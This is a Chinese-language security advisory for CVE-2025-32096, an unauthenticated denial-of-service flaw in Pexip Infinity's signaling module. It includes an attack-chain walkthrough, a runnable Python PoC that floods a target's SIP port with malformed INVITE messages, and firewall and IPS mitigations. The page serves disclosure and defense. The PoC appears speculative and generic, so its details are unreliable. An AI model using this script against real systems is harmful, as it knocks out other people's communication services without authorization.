CVE-2025-32096 Pexip Infinity 输入验证不当导致拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-32096

漏洞类型

输入验证不当/拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Pexip Infinity

漏洞概述

CVE-2025-32096是存在于Pexip Infinity视频会议平台中的一个高危安全漏洞。该漏洞影响Pexip Infinity 33.0至37.0版本，源于信令（signaling）模块中的输入验证不当。攻击者可以通过发送特制的恶意信令消息来触发软件的异常终止（abort），导致服务不可用，从而实现拒绝服务攻击。由于该漏洞的攻击向量为网络层面，且无需认证和用户交互，攻击者可以在无需任何凭据的情况下远程利用此漏洞。这使得该漏洞具有较高的可利用性和危害性，对企业视频会议系统的可用性构成严重威胁。Pexip Infinity作为企业级视频会议解决方案，被广泛应用于各种组织中，该漏洞的存在可能导致关键业务通信中断，影响企业的正常运营。

技术细节

该漏洞的根本原因在于Pexip Infinity的信令处理模块缺乏对输入数据的充分验证。攻击者构造包含异常字段或格式错误的信令消息，当这些消息被服务器处理时，会导致软件执行流进入不可预期的状态，最终触发abort()调用使进程异常终止。由于CVSS评分中可用性影响被标记为高（H），而机密性和完整性影响均为无或低，这表明该漏洞的主要危害在于服务可用性的破坏。攻击者可以通过持续发送恶意信令消息来实现持续性的拒绝服务，每次进程终止都会导致会议中断。由于无需认证，攻击者可以直接向信令服务端口发送攻击流量。该漏洞影响33.0到37.0的所有中间版本，表明问题可能存在于这些版本共享的代码路径中。修复版本37.1应该已针对输入验证逻辑进行了改进，添加了必要的边界检查和数据验证。

攻击链分析

STEP 1

步骤1

攻击者识别目标Pexip Infinity服务器，探测其信令服务端口（通常为5060/UDP）

STEP 2

步骤2

攻击者构造包含异常数据、格式错误和超长字段的恶意信令消息

STEP 3

步骤3

通过UDP协议向目标服务器发送特制的恶意信令消息，无需任何认证

STEP 4

步骤4

服务器信令模块处理恶意消息时，由于输入验证不当导致软件执行异常

STEP 5

步骤5

服务器进程触发abort()调用并异常终止，导致视频会议服务中断

STEP 6

步骤6

攻击者可持续发送恶意消息实现持续性拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 """ CVE-2025-32096 PoC - Pexip Infinity Signaling DoS This PoC demonstrates improper input validation in Pexip Infinity signaling that can trigger software abort leading to denial of service. """ import socket import struct import sys import time def create_malicious_signaling_message(): """ Create a malformed signaling message that triggers input validation failure """ # SIP-like malformed message with invalid fields message = b"INVITE sip:target@pexip-server SIP/2.0\r\n" message += b"Via: SIP/2.0/UDP attacker:5060\r\n" message += b"From: <sip:[email protected]>\r\n" message += b"To: <sip:target@pexip-server>\r\n" message += b"Call-ID: malformed-call-id-with-invalid-chars-\x00\xff\r\n" message += b"CSeq: 1 INVITE\r\n" # Malformed SDP with invalid content message += b"Content-Type: application/sdp\r\n" message += b"Content-Length: 999999\r\n" # Oversized content-length message += b"\r\n" message += b"v=0\r\n" message += b"o=- " + b"A"*1000 + b" 0 IN IP4 127.0.0.1\r\n" # Oversized field message += b"s=-\r\n" message += b"c=IN IP4 0.0.0.0\r\n" # Add malformed RTPP packets message += b"a=rtpmap:99 invalid/90000\r\n" return message def exploit_cve_2025_32096(target_ip, target_port=5060): """ Send malicious signaling message to trigger DoS """ print(f"[*] Target: {target_ip}:{target_port}") print(f"[*] Creating malicious signaling message...") payload = create_malicious_signaling_message() try: print(f"[*] Sending malformed signaling message...") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) sock.sendto(payload, (target_ip, target_port)) print(f"[+] Payload sent ({len(payload)} bytes)") # Wait and check if server responds time.sleep(1) # Send follow-up malformed messages to sustain DoS for i in range(5): sock.sendto(payload, (target_ip, target_port)) time.sleep(0.5) sock.close() print(f"[+] Attack completed - server should trigger abort") return True except socket.error as e: print(f"[-] Socket error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 5060 exploit_cve_2025_32096(target, port)

影响范围

Pexip Infinity 33.0

Pexip Infinity 33.1

Pexip Infinity 34.0

Pexip Infinity 35.0

Pexip Infinity 36.0

Pexip Infinity 37.0

防御指南

临时缓解措施

在防火墙或负载均衡器上限制对Pexip Infinity信令端口的访问，仅允许受信任的IP地址连接。对于无法立即升级的环境，可以考虑在信令服务前部署入侵防护系统（IPS）来检测和阻止恶意的信令消息。同时应启用详细的日志记录以便及时发现攻击尝试，并制定应急预案以便在遭受攻击时快速响应。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-32096
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-32096
3 Details https://www.cvedetails.com/cve/CVE-2025-32096/
4 VulDB https://vuldb.com/cve/CVE-2025-32096
5 Link https://docs.pexip.com/admin/security_bulletins.htm